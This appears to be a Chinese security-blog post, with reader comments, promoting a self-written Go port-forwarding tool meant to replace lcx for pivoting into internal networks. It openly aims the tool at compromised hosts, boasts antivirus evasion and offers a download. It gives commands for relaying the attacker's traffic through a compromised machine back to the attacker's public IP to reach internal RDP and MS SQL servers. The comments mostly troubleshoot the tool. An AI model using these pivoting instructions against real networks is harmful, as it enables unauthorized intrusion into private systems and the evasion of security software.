比lcx更好使的内网打洞工具

背景介绍

经常有朋友使用lcx,但是由于很多原因可能lcx都不好使,例如下面几点:

1、linux下不支持lcx,这时只能拿msf出来;

2、不免杀;

3、每次内网要重新连接其他主机的时候,都必须重新进去并重新敲打命令 ,并且操作过多时容易被发现。

最近正好上面那些问题都碰上了,于是没办法就使用golang自己写了一个。我写的这个lcx有以下几个特点:

1、golang程序跨平台性,甚至嵌入式Linux都支持;

2、免杀,基本上目前golang程序都不会被识别为病毒;

3、肉鸡只需操作一次,其他的都交给主控端操作。

该工具运行界面如下所示:

lcx1

 

使用方法

为了讲解该工具的功能和使用方法,以下列场景展开介绍:

lcx2

 

前提介绍:

网络拓扑如上图所示,内网私有,外网无法直接访问内网任意主机,但其中A已经控制了B。

实现目标:

攻击者A通过B 连接内网中任意一台计算机(如远程桌面,数据库等)。

场景一:A连接内网中C的远程桌面

第一步: 在B上面输入指令:

lcx 111.13.100.92 123

第二步:假如 A 想连接内网中 C 的远程桌面,那么在A上输入指令:

lcx 456 123 192.168.10.3 3389

这时, A 只用连接本机的456端口就等于连接内网C的3389端口了。

场景二:A连接内网中其他机器的MS SQL数据库(假设IP地址为192.168.10.55)

第一步,在B上输入指令:

lcx 111.13.100.92 123

第二步,在A上输入指令:

lcx 1433 123 192.168.10.55 1433

这时,A只用连接本机1433端口就等于连接内网中(192.168.10.55)的1433端口了。

工具下载

暂时只提供windows版本:lcx._g

【本文由Yatere投稿,安全脉搏PulseO0O整理发布】

【安全脉搏:分享技术、悦享品质。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】

23条评论

评论加载中,请稍等...
  • s1r1u5
    s1r1u5  回复

    端口转发吗,现在主要适用meterpreter的portfwd,不过先收了

  • hhyyaa  回复

    比lcx灵活一些。

  • 蒂娜  回复

    测试下载30MB文件崩溃

    • SP小编
      SP小编  回复

      @蒂娜 我们会通知作者关于这个bug以便进行修复 多谢测试

  • wonderkun  回复

    请教一下,如果我就拿下了一台机器,他却有防火墙,我无法连接他的3389端口,需要把他的3389端口转发出来,应该怎么做?

  • 中原  回复

    你说这个早就有了,只不过每人发出来。lcx确实不够灵活,但是体积比较小,压缩后在8K。不知道你这个go版本有多大。

  • 黑阔二大爷  回复

    不错,正需要这样的工具,lcx真TNND蛋疼 每次用它都是登录进去就卡死 无论网速多快的情况下都是如此。msf的portfwd虽然好用 但是在我服务器的kali2虚拟机里转发端口就不好用了 因为虚拟机处于内网 要物理机映射端口 portfwd不能再外网IP直接绑定端口 所以转发不了。搜半天了没找到能用的 试试你这个,先收下了 谢谢了!

  • BaldLei  回复

    嘿,哥们。 我怎么看不明白呢? 场景1的IP地址是什么呢? 我本机执行lcx._g.exe xx.xx.xx.xx 666,然后肉鸡执行lcx._g.exe 456 666 内网ip 3389,怎么不行呢?

  • BaldLei  回复

    请问出现exchange over 链接中断咋办?

  • haige  回复

    好像附件下载不了了?!

    • SP小编
      SP小编  回复

      @haige 没有问题 可以下载

  • YAIBA  回复

    留名

  • 求作者QQ  回复

    如果A直接想连B 该怎么决解 老实说真不会用

  • G  回复

    lcx 123 456 192.168.10.3 3389

  • 大大怪  回复

    如果A直接连接B呢?不会使

  • snoopy  回复

    我测试了下,转发不起,登录3389报协议错误

  • 33383622  回复

    测试了2台,没有成功???连接报协议错误!

  • tony  回复

    这个程序的源码可发布出来供学习下吗? 谢谢

  • 报错了  回复

    D:\tool>lcx._g.exe 123 192.168.128.18 3389
    123 3389 192.168.128.18
    2016/05/26 00:19:57 portforward listen on 123
    2016/05/26 00:21:23 remote dial failed: dial tcp 192.168.128.18:3389: ConnectEx
    tcp: A connection attempt failed because the connected party did not properly re
    spond after a period of time, or established connection failed because connected
    host has failed to respond.
    panic: runtime error: invalid memory address or nil pointer dereference
    [signal 0xc0000005 code=0x0 addr=0x14 pc=0x401c44]

    goroutine 1 [running]:
    main.main()
    F:/golang/src/lcx/main.go:78 +0xc44

  • 123  回复

    被360完美查杀

  • hacker  回复

    请问Linux版本什么时间分享?

  • Alieno  回复

    A连接B的话,真tm不会用,感觉贼鸡肋

  • 123  回复

    转发b的3389出来怎么操作呢?我测试报错。错误格式和这个一样,求解
    D:\tool>lcx._g.exe 123 192.168.128.18 3389
    123 3389 192.168.128.18
    2016/05/26 00:19:57 portforward listen on 123
    2016/05/26 00:21:23 remote dial failed: dial tcp 192.168.128.18:3389: ConnectEx
    tcp: A connection attempt failed because the connected party did not properly re
    spond after a period of time, or established connection failed because connected
    host has failed to respond.
    panic: runtime error: invalid memory address or nil pointer dereference
    [signal 0xc0000005 code=0x0 addr=0x14 pc=0x401c44]

    goroutine 1 [running]:
    main.main()
    F:/golang/src/lcx/main.go:78 +0xc44

    • secpulse
      secpulse  回复

      @123 lcx._g.exe 456 123 192.168.128.18 3389 这时, A 只用连接本机的456端口就等于连接内网C的3389端口了。

昵称*

邮箱*

网址

友情链接

合作伙伴